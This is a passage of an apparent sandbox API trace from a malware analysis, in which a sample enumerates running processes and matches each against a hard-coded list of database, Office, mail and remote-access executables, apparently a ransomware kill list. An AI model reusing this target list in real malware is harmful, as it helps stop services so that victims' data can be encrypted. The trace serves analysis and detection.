sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.787] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0112.788] lstrcmpiW (lpString1="bitkinex.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.788] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0112.789] lstrcmpiW (lpString1="coreftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.789] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0112.790] lstrcmpiW (lpString1="far.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.790] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0112.791] lstrcmpiW (lpString1="filezilla.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.791] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x308, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0112.792] lstrcmpiW (lpString1="flashfxp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.792] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0112.793] lstrcmpiW (lpString1="fling.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.793] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0112.794] lstrcmpiW (lpString1="foxmailincmail.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.794] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0112.795] lstrcmpiW (lpString1="gmailnotifierpro.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.795] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0112.796] lstrcmpiW (lpString1="icq.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.796] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0112.797] lstrcmpiW (lpString1="leechftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned -1 [0112.797] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0112.798] lstrcmpiW (lpString1="ncftp.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.823] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0112.824] lstrcmpiW (lpString1="notepad.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.824] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0112.825] lstrcmpiW (lpString1="operamail.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.825] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0112.826] lstrcmpiW (lpString1="outlook.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, sntlsrtsrvr.exe, w3wp.exe, TeamViewer_Service.exe, TeamViewer.exe, SecomSDK.exe, schedul2.exe, schedhlp.exe, adm_tray.exe, EXCEL.EXE, MSACCESS.EXE, OUTLOOK.EXE, POWERPNT.EXE, AnyDesk.exe, Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe, Microsoft.SqlServer.IntegrationServices.WorkerAgentServiceHost.exe") returned 1 [0112.826] Process32NextW (in: hSnapshot=0x210, lppe=0x39ee78 | out: lppe=0x39ee78*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0112.827] lstrcmpiW (lpString1="pidgin.exe", lpString2="msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, agntsvc.exe, mydesktopqos.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, steam.exe, thebat.exe, thebat64.exe, thunderbird.exe, visio.exe, winword.exe, wordpad.exe, sqlbrowser.exe, sqlservr.exe, TNSLSNR.EXE, mysqld.exe, MsDtsSrvr.exe, sqlceip.exe, msmdsrv.exe, mpdwsvc.exe, fdlauncher.exe, Launchpad.exe, chrome.exe, oracle.exe, devenv.exe, PerfWatson2.exe, ServiceHub.Host.Node.x86.exe, Node.exe, Microsoft.VisualStudio.Web.Host.exe, Lightshot.exe, netbeans64.exe, spnsrvnt.exe, 